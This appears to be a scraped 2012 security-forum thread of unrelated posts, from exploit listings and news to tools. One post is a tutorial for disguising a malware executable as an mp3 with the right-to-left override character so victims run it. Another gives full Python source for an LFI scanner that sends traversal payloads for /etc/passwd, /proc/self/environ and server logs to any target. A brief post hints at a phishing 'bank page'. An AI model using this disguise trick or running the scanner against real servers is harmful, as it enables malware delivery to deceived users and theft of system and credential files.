      -a--- 5/11/2012 6:34 PM    677     owncloud-ldap-backend.txt
      -a--- 5/29/2012 2:08 AM    1377    pbboard-lfi.txt
      -a--- 5/30/2012 2:29 AM    6996    pbboard-mcsrf-fu-cexe.rb.txt
      -a--- 5/29/2012 6:28 PM    2765    pbboard-sql.txt
      -a--- 5/21/2012 2:10 PM    949     phalbumpgs-xss.txt
      -a--- 5/18/2012 5:21 PM    5481    php54-exec.txt
      -a--- 5/20/2012 10:22 PM   1544    php543-null.txt
      -a--- 5/21/2012 2:11 PM    1956    php543sink-dos.txt
      -a--- 5/22/2012 2:11 PM    11877   phpcgi-exploit.txt
      -a--- 5/6/2012 5:16 AM     1328    phpcgi-inject.txt
      -a--- 5/23/2012 6:22 PM    1202    phpcollab-bypass.txt
      -a--- 5/23/2012 5:29 AM    1500    phpcollab-disclose.txt
      -a--- 5/23/2012 3:12 PM    2045    phpcollab-upload.txt
      -a--- 5/8/2012 4:13 PM     2520    phpenter-exec.txt
      -a--- 5/26/2012 6:07 PM    2360    phplist-inject.txt
      -a--- 5/2/2012 4:19 AM     462     phppastebin-xss.txt
      -a--- 5/29/2012 2:01 AM    1625    phpvolunteerms-shellxss.txt
      -a--- 5/29/2012 1:59 AM    1089    phpvolunteerms-sql.txt
      -a--- 5/6/2012 4:32 AM     3802    php_cgi_arg_injection.rb.txt
      -a--- 5/31/2012 3:12 AM    7730    php_volunteer_upload_exec.rb.txt
      -a--- 5/25/2012 11:24 PM   5666    pligg121-lfixss.txt
      -a--- 5/21/2012 5:22 PM    590     ploggerpg-sql.txt
      -a--- 5/3/2012 12:33 AM    2457    pluxml-lfi.txt
      -a--- 5/25/2012 11:19 PM   2919    pragmamx1121-xss.txt
      -a--- 5/13/2012 10:22 PM   13470   proservrex_1.tgz
      -a--- 5/2/2012 12:27 AM    1577    pvmgm-sql.txt
      -a--- 5/11/2012 6:23 PM    49362   qnx-overflows.tgz
      -a--- 5/27/2012 10:06 PM   4634    quickshare_traversal_write.rb.txt
      -a--- 5/25/2012 11:56 PM   2264    rabidhamster_r4_log.rb.txt
      -a--- 5/7/2012 10:56 PM    865     ramuiforum-xss.txt
      -a--- 5/20/2012 9:22 PM    1396    realdraw-dos.txt
      -a--- 5/25/2012 11:36 PM   1910    resedit-overflow.tgz
      -a--- 5/18/2012 6:22 PM    925     resultsunlimitedcms-sql.txt
      -a--- 5/3/2012 12:22 AM    4656    rt-sa-2012-002.txt
      -a--- 5/23/2012 5:50 AM    17923   ruubik111-xssdisclosetraversal.txt
      -a--- 5/15/2012 5:39 AM    669     sabre-xss.txt
      -a--- 5/2/2012 4:15 AM     4356    samsung-activex.txt
      -a--- 5/27/2012 9:50 PM    171799  santilga-sqlxsrf.txt
      -a--- 5/18/2012 5:18 PM    3136    skincrafter-overflow.txt
      -a--- 5/26/2012 6:06 PM    1038    smallcms-inject.txt
      -a--- 5/31/2012 3:08 AM    1145    snapdeal-xssredir.txt
      -a--- 5/24/2012 6:27 PM    4358    socialengine-xssxsrf.txt
      -a--- 5/12/2012 6:21 PM    1688    sockso-xss.txt
      -a--- 5/2/2012 4:24 AM     3648    solarwindsstoragemanager-sql.txt
      -a--- 5/6/2012 4:33 AM     6837    solarwinds_storage_manager_sql.rb.txt
      -a--- 5/13/2012 4:33 PM    3176    SOS-12-005.txt
      -a--- 5/2/2012 4:22 AM     325     strato-traversal.txt
      -a--- 5/31/2012 3:11 AM    4648    styledesign-sql.txt
      -a--- 5/14/2012 1:22 AM    11629   suitelink_1.tgz
      -a--- 5/23/2012 5:44 AM    6587    supernews261-sql.txt
      -a--- 5/16/2012 1:21 AM    2286    svg-trigger.tgz
      -a--- 5/23/2012 4:33 PM    2171    symantecendpoint-exec.txt
      -a--- 5/26/2012 6:04 PM    957     symantecwg-lfi.txt
      -a--- 5/6/2012 5:08 AM     974     symantecwg-xss.txt
      -a--- 5/29/2012 2:19 AM    2762    symantec_web_gateway_lfi.rb.txt
      -a--- 5/23/2012 5:27 AM    2344    tftpd32-dos.txt
      -a--- 5/29/2012 1:54 AM    2422    tftpd32dns-dos.txt
      -a--- 5/15/2012 2:23 AM    1532    tftp_server_v14ST.rb.txt
      -a--- 5/29/2012 2:07 AM    2566    topicsviewer-lfisql.txt
      -a--- 5/6/2012 5:22 AM     728     trombinoscope-sql.txt
      -a--- 5/16/2012 1:08 AM    3774    tuninfo-sql.txt
      -a--- 5/14/2012 8:23 PM    1124    universalreader-dos.txt
      -a--- 5/14/2012 8:23 PM    3758    vallarta-sql.txt
      -a--- 5/30/2012 2:33 AM    4019    vamcart-shellxsrf.txt
      -a--- 5/30/2012 2:34 AM    8087    vamcart09_rce.rb.txt
      -a--- 5/19/2012 4:40 AM    784     vanillaaboutme-xss.txt
      -a--- 5/19/2012 9:22 PM    708     vanillafln-xss.txt
      -a--- 5/19/2012 4:41 AM    610     vanillalc-xss.txt
      -a--- 5/2/2012 4:40 AM     1392    vbulletin4112-xss.txt
      -a--- 5/2/2012 4:14 AM     695     veissweb-sql.txt
      -a--- 5/19/2012 3:12 PM    2957    vertrigoserv-escalate.txt
      -a--- 5/2/2012 4:42 AM     3641    VL-321.txt
      -a--- 5/2/2012 4:35 AM     12925   VL-511.txt
      -a--- 5/13/2012 9:00 AM    5015    VL-512.txt
      -a--- 5/13/2012 1:22 AM    7127    VL-513.txt
      -a--- 5/6/2012 4:42 AM     5706    VL-516.txt
      -a--- 5/4/2012 5:56 PM     7405    VL-517.txt
      -a--- 5/12/2012 5:22 PM    5834    VL-519.txt
      -a--- 5/12/2012 3:12 PM    6491    VL-521.txt
      -a--- 5/4/2012 5:58 PM     9450    VL-524.txt
      -a--- 5/13/2012 8:56 AM    9404    VL-525.txt
      -a--- 5/13/2012 9:02 AM    7680    VL-530.txt
      -a--- 5/12/2012 4:13 PM    5603    VL-535.txt
      -a--- 5/4/2012 6:00 PM     10643   VL-536.txt
      -a--- 5/2/2012 4:48 AM     13642   VL-537.txt
      -a--- 5/2/2012 4:20 AM     4290    VL-538.txt
      -a--- 5/13/2012 9:04 AM    4361    VL-560.txt
      -a--- 5/4/2012 1:45 AM     5982    vlc_mms_bof.rb.txt
      -a--- 5/6/2012 4:39 AM     8324    vmware-backdoor.txt
      -a--- 5/4/2012 1:43 AM     3285    waraxe-2012-SA087.txt
      -a--- 5/4/2012 2:11 AM     3109    waraxe-2012-SA088.txt
      -a--- 5/25/2012 11:56 PM   3953    webid_converter.rb.txt
      -a--- 5/6/2012 5:23 AM     3047    webrelations-sql.txt
      -a--- 5/28/2012 9:22 PM    2119    whmcs-sql.tgz
      -a--- 5/31/2012 2:47 AM    2541    whmcs-xssxsrf.txt
      -a--- 5/27/2012 9:51 PM    4011    whyweb-sql.txt
      -a--- 5/12/2012 12:58 AM   6565    wikka_spam_exec.rb.txt
      -a--- 5/3/2012 12:06 AM    1829    win32k-dos.txt
      -a--- 5/2/2012 4:46 AM     748     windsonline-sql.txt
      -a--- 5/29/2012 1:55 AM    1516    winradius-dos.txt
      -a--- 5/23/2012 5:45 AM    15808   winxpkeyboard.zip
      -a--- 5/24/2012 6:15 PM    1816    wiresharkdiameter-dos.tgz
      -a--- 5/24/2012 6:12 PM    3289    wiresharkdis-dos.tgz
      -a--- 5/24/2012 5:53 PM    536     wiresharkmisalign-dos.tgz
      -a--- 5/31/2012 2:51 AM    3750    wmsvaio-overflow.txt
      -a--- 5/6/2012 4:46 AM     1010    wordpress322-xss.txt
      -a--- 5/11/2012 5:26 AM    6023    wp2click-xss.txt
      -a--- 5/15/2012 6:09 AM    881     wp2clicksocialmedia-xss.txt
      -a--- 5/11/2012 5:34 AM    25581   wpbadbehavior-xss.txt
      -a--- 5/11/2012 5:31 AM    6587    wpbetterwp-xss.txt
      -a--- 5/11/2012 5:32 AM    7078    wpbulletproof-xss.txt
      -a--- 5/15/2012 6:08 AM    1024    wpcatablog-xss.txt
      -a--- 5/15/2012 6:05 AM    686     wpcodestyling-xss.txt
      -a--- 5/11/2012 5:29 AM    12032   wpcustomcontacts-xss.txt
      -a--- 5/15/2012 6:02 AM    786     wpdownloadmanager-xss.txt
      -a--- 5/15/2012 6:00 AM    960     wpdownloadmonitor-xss.txt
      -a--- 5/15/2012 5:59 AM    668     wpdynamicwidgets-xss.txt
      -a--- 5/15/2012 5:09 AM    685     wpeasygallery-xss.txt
      -a--- 5/15/2012 5:58 AM    684     wpezpzoneclickbackup-xss.txt
      -a--- 5/13/2012 6:22 PM    1113    wpfacethumb-xss.txt
      -a--- 5/15/2012 5:54 AM    1340    wpforumserver-sqlxss.txt
      -a--- 5/15/2012 5:53 AM    814     wpgdstarrating-xss.txt
      -a--- 5/15/2012 5:57 AM    771     wpgrandflashalbumgallery-xss.txt
      -a--- 5/15/2012 5:52 AM    718     wpiframeadminpages-xss.txt
      -a--- 5/15/2012 5:49 AM    763     wpleaflet-xss.txt
      -a--- 5/15/2012 5:46 AM    841     wpleaguemanager-xss.txt
      -a--- 5/15/2012 5:45 AM    818     wpmediacategories-xss.txt
      -a--- 5/15/2012 5:44 AM    1089    wpmingleforum-xss.txt
      -a--- 5/15/2012 5:43 AM    689     wpnetworkpublisher-xss.txt
      -a--- 5/15/2012 5:42 AM    1552    wpnewslettermanager-xss.txt
      -a--- 5/15/2012 5:51 AM    838     wppdfprintbutton-xss.txt
      -a--- 5/15/2012 5:40 AM    1333    wpprettylinklite-sqlxss.txt
      -a--- 5/15/2012 5:19 AM    761     wpshareandfollow-xss.txt
      -a--- 5/15/2012 5:18 AM    821     wpsharebar-sqlxss.txt
      -a--- 5/15/2012 5:17 AM    913     wpsoundcloud-xss.txt
      -a--- 5/15/2012 5:06 AM    804     wpstatistics-xss.txt
      -a--- 5/15/2012 5:16 AM    1028    wpsubscribe2-xss.txt
      -a--- 5/15/2012 5:03 AM    1347    wpsurveyquiztool-xss.txt
      -a--- 5/15/2012 9:00 PM    711     wptrackthatstat-xss.txt
      -a--- 5/15/2012 5:00 AM    1542    wpzingiriwebshop235-xss.txt
      -a--- 5/9/2012 8:22 PM     1030    x7chat-xsrf.txt
      -a--- 5/29/2012 1:57 AM    4182    yamamah-disclose.txt
      -a--- 5/22/2012 6:38 AM    851     yandex-xss.txt
      -a--- 5/23/2012 6:22 PM    869     ydframework-disclose.txt
      -a--- 5/3/2012 12:41 AM    7231    ZSL-2012-5086.txt
      -a--- 5/9/2012 5:08 AM     1081    ZSL-2012-5087.txt
      -a--- 5/17/2012 2:42 AM    1393    ZSL-2012-5088.txt
      -a--- 5/17/2012 3:10 AM    1063    ZSL-2012-5089.txt
      -a--- 5/17/2012 3:17 AM    3110    ZSL-2012-5090.txt
      -a--- 5/17/2012 3:19 AM    2751    ZSL-2012-5091.txt

      Download: Packet Storm New Exploits For May, 2012 - Packet Storm
  12. Want to work but have nowhere to do it? Here you go: https://rstcenter.com/forum/53480-youve-got-money.rst
  13. Sudeep Singh, 5/21/2012

      Table of Contents
        Preface
        Advanced Hash Cracking ... 3
        Cryptographic Hash Properties ... 4
        Hash to the Stash ... 5
        Oclhashcat – An insight ... 6
        The need for Stronger Hashes ... 13
        Fast vs Slow Hashes ... 19
        How much Salt? ... 20
        How Many Iterations? ... 21
        John The Ripper (JTR) – Tweak That Attack! ... 25
        JTR POT Analyzer ... 27
        Word Mangling Rules ... 33
        GPU Vs CPU ... 37
        Conclusion ... 41
        References ... 43

      http://dl.packetstormsecurity.net/papers/general/advanced-crack.pdf
  14. The United Nations will meet in Dubai this December to make a decision that could carry significant consequences for the future of all web users: Should the UN be granted more control over the Internet? With the high-profile meeting looming at the end of this year's calendar, key members of the U.S. government and private sector firms will meet with lawmakers Thursday to argue that the U.S. should work to defeat the proposal, which they consider a dangerous breach of existing norms. Currently, the Internet is regulated in what's called a "multi-stakeholder" model, with various private and public organizations each playing specific roles in keeping its wheels spinning. Change that setup, argues the panel, and you put at risk the entire structure of the Internet. "A top-down, centralized, international regulatory overlay is antithetical to the architecture of the Net, which is a global network of networks without borders," wrote FCC Commissioner and panel member Robert McDowell in the Wall Street Journal. "No government, let alone an intergovernmental body, can make engineering and economic decisions in lightning-fast Internet time." Countries in favor of the plan, such as Russia and China, have argued that the organizations currently charged with oversight of the Internet, such as the Internet Corporation for Assigned Names and Numbers, or ICANN, are too closely tied to the United States. Moving Internet regulatory authority to the UN, they argue, would democratize control over it. However, some Internet privacy experts are concerned that giving censorship-heavy nations such as China more say in Internet regulation would have disastrous consequences for online free speech. "Maybe it bothers you that the U.S. controls these major keys to the Internet, but I think it's a good thing," wrote Larry Seltzer for Byte. "Without control of these critical facilities, no international group of dictators can really exert much control outside of their own boundaries."

      Included in the panel will be Ambassador Philip Verveer, Deputy Assistant Secretary of State and U.S. Coordinator for International Communications and Information Policy; FCC Commissioner Robert McDowell; Ambassador David A. Gross, Former U.S. Coordinator for International Communications and Information Policy; Sally Shipman Wentworth, Senior Manager of Public Policy at the Internet Society; and Vinton Cerf, Vice President and Chief Internet Evangelist at Google. The House subcommittee panel will be broadcast via the web at 10:15 a.m. ET on Thursday, May 31. Source
  15. Overview
Part I User Commands 2
Part II System Calls 738
Part III Library Functions 892
Part IV Special Files 1064
Part V File Formats 1104
Part VI Games 1210
Part VII Miscellaneous 1214
Part VIII Administration and Privileged Commands 1258
Part IX Kernel Reference Guide 1424
Download
  16. Fi8sVrs

    Hello.

    https://rstcenter.com/forum/28420-interviu-bine-ati-venit.rst
  17. This is a useful tut I found, all credits go to Cuddle:

This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! Normally, changing the extension to e.g. .mp3 will corrupt your file, but with this exploit your file will still be executable!

1. I have my server.exe, but I want it to look like an mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end. Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).

2. Now it's time to use the exploit! Open up the Character Map: Scroll down and find the "U+202E: Right-To-Left Override" character: Click "Select" and then "Copy".

3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste). Then type "3pm" (without the " ") and press Enter. Now it should look like this: Done!

Obviously you might want to change the icon to look like an mp3 before doing this. A short video can be found here: - [MediaFire] - [MultiUpload] - [ ] (Watch in HD + Fullscreen)

Most browsers have patched this, but it can be used on IMs like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside. Now go ahead and mix around with .exe/.scr/.com and the fake extensions to find some other legit-looking combinations! If you have any questions, feel free to ask!

Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers/general/righttoleften-override.pdf

Those who can't find the character in the default CharMap in Windows, do this (not sure if it works but worth a try):
1. Download BabelMap and run it.
2. Open this picture:
- Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font.
- Search for OVERRIDE and click on the RTLO character (row 2020, column E)
- Click on the Select button
- Click on the Copy button

Also, those who have problems with WinXP and non-English OS versions, take a look at this. article from r00tw0rm
  18. Description
PwnPi v1.0
----------
About
- ssh: enabled at boot
- vnc: ssh into pwnpi and run ./start-vnc-1024x768.sh (you can open this with nano and change the resolution)
- base distro: debian squeeze
- desktop environment: xfce
ssh
- username: root
- password: root
vnc
- vnc password = rasppi
postgresql
- username: root
- password: root
- database: postgres (used for metasploit)
metasploit
- don't run metasploit when X is running as there is not enough memory. Logout and cd to /pentest/exploits/framework3 then ./msf.sh to connect to the database and load db_autopwn.
- make sure you have started the postgresql server if you want database support by running /etc/init.d/postgresql start
bugs/suggestions/tool requests/
Download Source
  19. iptables is built on top of netfilter, the packet alteration framework for Linux 2.4.x and 2.6.x. It is a major rewrite of its predecessor ipchains, and is used to control packet filtering, Network Address Translation (masquerading, port forwarding, transparent proxying), and special effects such as packet mangling. Changes: This release supports the new cttimeout infrastructure. This allows you to attach specific timeout policies to flows via iptables CT targets. Download: Linux IPTables Firewall 1.4.14 (Packet Storm)
  20. send.php <?php ?> Tracking Number. What is it, a bank page?
  21. # Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner
# Greets: To all members of r00tw0rm !!
Usage: h3x4r.py <Target IP> <Port> <Path>
Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src=
Information: random User-Agent; coded in Python. (Screenshots in the post: Banner(), "Not Vulnerability", "Vulnerability".)
[*] Update Ver. 1.1: menu to select scan type; added scan types environ and logs.
[Python] scan ver 1.1.py - Pastebin.com

#!/usr/bin/python
# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner Ver. 1.1
# Greets: To all members of r00tw0rm !!
# Written for Python 2 (print statements, httplib, str-based sockets).
import socket, sys, re, random, time, httplib


def traversals(target_path, max_depth):
    """Candidate list for one file: the absolute path, then 1..max_depth levels
    of ../ in front of it; every variant once plain and once with a trailing
    %00 (null byte, to cut off an appended suffix such as .php)."""
    plain = ["/" + target_path] + ["../" * n + target_path for n in range(1, max_depth + 1)]
    return plain + [p + "%00" for p in plain]


# Same candidate lists as the original hard-coded arrays, generated instead of typed out.
passwd = traversals("etc/passwd", 13)
environ = traversals("proc/self/environ", 14)

LOG_FILES = [
    "usr/local/apache2/logs/access_log",
    "var/log/apache2/access.log",
    "var/log/httpd/access_log",
    "var/log/httpd-access.log",
    "var/www/logs/access_log",
    "var/apache2/logs/access_log",
]
logs = []
for base in LOG_FILES:
    logs += traversals(base, 14)

user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
        'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
        'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
        'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
        'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
        'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
        'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
        'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
# One random User-Agent is picked per run and reused for every request.
agent = random.choice(user)


def fetch(lfi):
    """Send one raw HTTP/1.0 GET for /path+lfi and return the whole response.
    Any socket error aborts the scanner, as in the original."""
    try:
        r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        r.connect((target, port))
        r.send("GET /" + path + lfi + " HTTP/1.0\r\n")
        r.send("Host: " + target + "\r\n")
        r.send("User-Agent: " + agent + "\r\n\r\n")
        print "[*] Send Request Success"
        print "http://" + target + "/" + path + lfi
        fullpage = ""
        page = r.recv(1024)
        while len(page):
            fullpage = fullpage + page
            page = r.recv(1024)
        r.close()
        return fullpage
    except Exception, e:
        print "[-] Cant Not Send Request"
        print e
        sys.exit(1)


def scan(candidates, marker):
    """Request every candidate path and stop at the first response that
    contains marker (a regex); wait one second between requests."""
    for lfi in candidates:
        fullpage = fetch(lfi)
        if re.search(marker, fullpage):
            print "\033[32m[*] Request Vulnerability\n"
            sys.exit(1)
        else:
            print "[-] Request Is Not Vulnerability\n"
        time.sleep(1)


def scanpasswd():
    # A real /etc/passwd always contains the root entry.
    scan(passwd, "root:x:0:0:")


def scanenviron():
    # /proc/self/environ of the web server process carries CGI variables.
    scan(environ, "HTTP_HOST")


def scanlogs():
    # Plant a recognisable request line in the server's access log first,
    # then look for that same line in each candidate log path.
    conn = httplib.HTTPConnection(target, port)
    conn.request("HEAD", "/")
    scan(logs, "HEAD / HTTP/1.1")


def menu():
    print "Menu:\n"
    print "ID [1]"
    print "[Scan /etc/passwd File]\n"
    print "ID [2]"
    print "[Scan Environ File]\n"
    print "ID [3]"
    print "[Scan Access Logs File]\n"
    print "ID [4]"
    print "[Exit]\n"
    mess = raw_input("[*] Select ID For Start Scanner :")
    if mess == "1":
        print "Scan /etc/passwd File Starting ...\n"
        scanpasswd()
        sys.exit(1)
    elif mess == "2":
        print "Scan /proc/self/environ File Starting ...\n"
        scanenviron()
        sys.exit(1)
    elif mess == "3":
        print "Scan Access Logs File Starting ...\n"
        scanlogs()
        sys.exit(1)
    elif mess == "4":
        print "Exiting..."
        sys.exit(1)
    else:
        print "Unknow Command\n"
        print "Please rechoice ID\n"
        menu()


def banner():
    print "\n"
    print "****************************************************************************"
    print "||                Local File Include Scaner Ver. 1.1                      ||"
    print "||                        by parkdream1                                   ||"
    print "||               (c) R00TW0RM - Private Community                         ||"
    print "   Fucking from " + target + " on port " + str(port)
    print "****************************************************************************"
    print "\n"


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
        print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 " + '"index.php?src="'
        sys.exit(1)
    # Module-level globals used by fetch(), scanlogs() and banner().
    target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    banner()
    menu()

source
  22.
1. MyWot: WOT is a community-based, free safe surfing tool for browsers that provides website ratings & reviews to help web users as they search, surf & shop online. website: www.mywot.com
2. VirusTotal: VirusTotal is a free virus, malware and URL online scanning service. File checking is done with more than 40 antivirus solutions. website: www.virustotal.com
3. Norton Safe Web, from Symantec: Look up website safety information and safe site rankings from Norton Safe Web from Symantec. Read what others think and write your site reviews. website: www.safeweb.norton.com
4. Unmask Parasites: Free online website security service. Check your web pages for hidden illicit content (invisible spam links, iframes, malicious scripts and redirects). website: www.unmaskparasites.com
5. Google Diagnostic: checks whether a site hosts malware or not. website: http://google.com/safebrowsing/diagnostic?site=target.com
6. Online Link Scan: Online Link Scan collects and summarizes the threat reports of the aforementioned Phishtank, AVG and Google Safe Browsing engines. website: www.onlinelinkscan.com
  23. A.R.F Intro
The A.R.F Project Anti-Reversing Framework v1.1
Author: Economou Kyriakos
Contact: arfproject@hotmail.com
Programming Language: C++
Compatibility: Win XP SP1 or above
IDE plug ‘n compile: MS Visual Studio (tested with 2008/2010 editions), Embarcadero C++ builder (tested with 2010 edition).
Release Date: 17d/01m/2011

Intro

After having dedicated some years to breaking software protections I have arrived at some conclusions regarding how things work among software developing companies in this matter. A company that produces any type of software always has in mind the quality of the final product to be released. This means that its coders dedicate all of their time to developing the software that is going to be released, by searching for bugs and errors and by improving the code of the software. However, when all this has come to an end and it is time to release the software, all companies have to, or at least they should, deal with another big decision, which is of course “how” their product is going to be protected from crackers.

For the big companies that have more money than time in their hands it is easier to decide, because their budget can afford any type of commercial protection and it is only a matter of taste regarding the quality of the protection that is going to be chosen. However, even if these companies are able to choose among a variety of protections, the impact of this decision can be destructive in zero time. Commercial protectors offer much more quality than the free ones, but they have a major flaw. This flaw lies in the fact that before a company applies a well known commercial protector, others have already done so, which means that it has probably already been reversed. So why should you spend money on a protection that you know has already been cracked?!?

On the other hand, crackers usually have much more time than money in their hands and this is what makes them dangerous. They will usually try to break the protection by themselves or read a tutorial about it and use it as a guide. In any case it is just a matter of time before they say “Game Over!”

So then, why don't companies create their own custom protections? The answer is simple: it requires time, money and people who know the basics of reverse engineering, in other words how a cracker would attack the protection of the software. All this would normally require a separate department of employees dedicated to the development of the protection itself, but companies don’t seem to approve of this idea, and you know the results. But crackers, won’t they crack that protection too? The answer is “Yes!”, but as we have already said, the entire game revolves around a more specific and relative concept, which is “time”. A custom protection must be analyzed each time from scratch, and if it is well designed it could take crackers much more time than you may think, so the company will have the opportunity to gain time and money before the game comes to an end.

So what if a company wants to use a commercial protector? Even if they have the flaw that we discussed before, many commercial protectors are very good and can keep a large number of crackers, especially newbies, away. But even in this case, why should you rely only on the protector itself?!? Well, you shouldn’t, and this is where the A.R.F Project comes into the game. You could use it in order to add an extra layer of protection inside the code of your application itself that will protect your software when the protector will not. Furthermore, it can be a good solution for single developers and companies that cannot afford either the money for a commercial protector or the time to develop a custom protection from scratch.

The A.R.F Project is free and comes with full source code and documentation of the available anti-reversing methods. This also gives developers the possibility to modify these methods at will, combine them together and even get inspired to create something better in less time than ever before. In addition, through the A.R.F Project you can understand how some of the most famous anti-reversing tricks work and learn how an attacker would attempt to bypass them, which will help you create your own custom software protection. The available methods will constantly be updated and more methods are going to be added in the days to come. The A.R.F project offers plug ‘n compile compatibility with MS Visual Studio (tested with 2008/2010 editions) and Embarcadero C++ Builder (tested with 2010 edition).

Greetings: This project is dedicated to all the people that I really respect for their devotion to their passions without thinking about the consequences. A big salute to my friends Yiannis Marangos, Alexandros Theodoridis, Panos Papandoniou, Kyprianos Vasilopoulos and Anna Manousaki.

Enjoy, Economou Kyriakos
Site: http://www.anti-reversing.com/intro/
Download: http://www.anti-reversing.com/Downloads/A.R.F/A.R.F_v1.1.zip
via: level-23.biz/forum/
  24. Chocolatey - think executables/application packages (like apt-get for Windows), not library packages. This is what the Chocolatey NuGet goodness is for. Chocolatey allows you to install application nuggets and run executables from anywhere.

Executable Nuggets: For example, say you have an executable in the tools folder of your package named bob.exe. Then you can type 'chocolatey install yourPackageName [-source source] [-version version]' OR 'cinst yourPackageName [-source source] [-version version]' and when it finishes you can type 'bob' and it will run your application executable.

Application Nuggets - Full on double rainbow: For example, say you type 'chocolatey install 7zip [-source source] [-version version]' OR 'cinst 7zip [-source source] [-version version]' - when it finishes you will have installed 7zip on your machine (in your add/remove programs).

Check out the WIKI in the project URL for all the details of what you can do with chocolatey!

To install Chocolatey, run the following command from the command line or from PowerShell:
C:\> cinst chocolatey
How to Download packages list